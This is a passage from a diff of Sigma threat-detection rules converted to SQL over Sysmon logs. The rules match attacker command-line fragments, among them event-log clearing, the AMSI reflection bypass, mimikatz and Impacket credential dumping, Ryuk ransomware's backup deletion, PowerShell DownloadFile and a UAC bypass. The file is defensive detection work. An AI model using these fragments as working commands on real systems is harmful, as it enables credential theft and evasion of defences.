LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine 
LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "status": "experimental", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion", + "attack.t1036.002" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' 
ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Interactive AT Job", - "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": 
"proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", - "status": "test", - "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", - "author": "frack113", + "title": "Set Suspicious Files as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + "status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "status": "test", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other programs that use these command line option and accepts an 'All' parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", - "status": "experimental", - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + 
"attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", 
"tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND 
(CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "status": "test", - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "status": "experimental", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 
'%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_hktl_sharp_chisel.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", - "status": "experimental", - "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001", - "attack.g0069" + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution", - "attack.reconnaissance", "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.t1614.001" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.execution", + "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Administrative scripts", + "Microsoft SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE 
